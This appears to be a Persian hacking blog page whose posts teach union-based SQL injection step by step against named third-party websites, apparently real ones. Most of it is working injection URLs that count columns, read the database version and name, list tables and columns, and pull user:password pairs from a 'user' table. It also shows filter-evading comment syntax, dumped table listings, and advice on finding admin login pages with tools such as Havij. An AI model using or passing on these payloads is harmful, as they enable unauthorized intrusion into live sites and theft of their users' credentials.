Check Page Rank امنیت* هک * سیستم عامل * دانلود * و ....
 
امنیت* هک * سیستم عامل * دانلود * و ....
موفقیت از آن كسانی است كه منتظر دیگران نمی مانند
                                                        
درباره وبلاگ


مدیر وبلاگ : هکر تازه وارد
نویسندگان
آمار وبلاگ
  • کل بازدید :
  • بازدید امروز :
  • بازدید دیروز :
  • بازدید این ماه :
  • بازدید ماه قبل :
  • تعداد نویسندگان :
  • تعداد کل پست ها :
  • آخرین بازدید :
  • آخرین بروز رسانی :
https://dde.ptu.ac.in/alumni-detail.php?id=24%27+order+by+18--+

https://dde.ptu.ac.in/alumni-detail.php?id=24%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+

https://dde.ptu.ac.in/alumni-detail.php?id=24%27+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+

https://dde.ptu.ac.in/alumni-detail.php?id=24%27+union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+

https://dde.ptu.ac.in/alumni-detail.php?id=24%27+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables--+

https://dde.ptu.ac.in/alumni-detail.php?id=24%27+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where+table_schema=database()--+

https://dde.ptu.ac.in/alumni-detail.php?id=24%27+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+where+table_name=0x75736572--+

https://dde.ptu.ac.in/alumni-detail.php?id=24%27+union+select+1,group_concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+user--+




نوع مطلب :
برچسب ها :
لینک های مرتبط :




به نام خدا
خوب دوستان پس از اینکه ما توانستیم یوزرنیم و پسورد را به دست بیاریم حالا نوبت این است که به دنبال ادمین پیج برای ورود به سایت باشیم .

برای اینکار چند راه مختلف وجود دارد . 

1. استفاده از سایت های آنلاین برای پیدا کردن ادمین پیج
2. استفاده از نرم افزار های مربوط به این کار مثل هویج و اکانتیس و ... که باید اقدام به تهیه آنها کنید 
3. به صورت دستی تو آدرس بار تست کنید تا ادمین پیج رو پیدا کنید . 

نکته : در بعضی از سایت ها ادمین پیج وجود ندارد یعنی سایت از طریق دیگری آپدیت یا بروزرسانی می شود . 




نوع مطلب :
برچسب ها :
لینک های مرتبط :









به نام خدا 

خوب دوستان بعد از اینکه ما تونستیم تیبل ادمین رو از دیتابیس بیرون بکشیم حالا نوبت این است که اطلاعت تیبل ادمین که شامل یوزرنیم و پسورد میباشد رو بیرون بکشیم که در اینصورت بصورت زیر عمل کرده . 


http://www.discover.com.pa/english/pa_index.php?id=-31%27+/*!50000uNion+select*/+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x75736572-
-

در اینجا ما اسم تیبل ادمین رو هگز کرده و پس از دستور where اون رو استفاده می کنیم تا اطلاعات تیبل ادمین رو بدست بیاریم




نوع مطلب :
برچسب ها :
لینک های مرتبط :




به نام خدا

همانطور که در کد زیر مشاهده می کنید ما دستور بیرون کشیدن تیبل ها رو از دیتا بیس information_schema وارد کردیم

زمانی پیش میاد که شما تیبل ادمین رو در دیتابیس information_schema پیدا نمی کنید همانند بالا در واقع این تیبل در یک دیتابیس دیگری قرار دارد و شما باید از آن

دیتابیس تیبل ادمین را بدست آورید که برای این کار به صورت زیر عمل کرده :

http://www.bollyclips.com/list.php?pagenum=0&categoryid=10+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--+

همان طور که مشاهده می کنید یه قسمت به دستورات قبلی اضافه شده برای اینکه جستجو برای تیبل ادمین در دیتابیس دیگر صورت پذیرد که در ادامه به شما

نشان خواهیم داد چگونه دیتابیس های دیگر را پیدا کنید چرا که ممکن یه سایت چند تا دیتابیس داشته باشد .






نوع مطلب : امنیت و تست نفوذ در سایت، 
برچسب ها :
لینک های مرتبط :




به نام خدا

خوب دوستان تا به اینحا ما توانستیم که سایت رو از نظر نفوذ پذیری تست کنیم و اطلاعات لازم رو از آن بیرون بکشیم که در این مرحله از آموزش چگونگی بیرون

کشیدن تیبل ها رو نشان می دهیم :


http://www.discover.com.pa/english/pa_index.php?id=-31%27+/*!50000uNion+select*/+1,2,group_concat%28table_name%29,4+from+information_schema.tables--+

 group_concat(table_name)همان طور که مشاهده می کنید ما از چند دستور جدید در تارکت استفاده کردیه ایم مورد اول دستور

information_schemaمی باشد کار این دستور بیرون مشیدن تمام تیبل های سایت می باشد و اما دستور

.این یکی از دیتابیس های موجود در سایت است که ممکن  است تیبل ادمین در آن باشد

خوب حالا اگر این دستور را احرا کنیم تیبل های مجود در این دیتابیس نمایش داده می شود

CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,
INDEX_STATISTICS,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARAMETERS,PARTITIONS,
PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,
SESSION_VARIABLES,STATISTICS,TABLES,TABLESPACES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,THREAD_STATISTICS,
TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIEWS,INNODB_BUFFER_PAGE,INNODB_TRX,INNODB_BUFFER_POOL_STATS,
INNODB_LOCK_WAITS,INNODB_CMPMEM,INNODB_CMP,INNODB_LOCKS,INNODB_CMPMEM_RESET,INNODB_CMP_RESET,
INNODB_BUFFER_PAGE_LRU,collection,collection2permission,cr_news,news,page,permission,productos,user,user2collection

خوب همان طور که مشاهده می کنید تیبلی که در آن یورزر و پسورد نگه داشته می شود به رنگ قرمز مشخص شده




نوع مطلب : امنیت و تست نفوذ در سایت، 
برچسب ها :
لینک های مرتبط :






( کل صفحات : 252 )    1   2   3   4   5   6   7   ...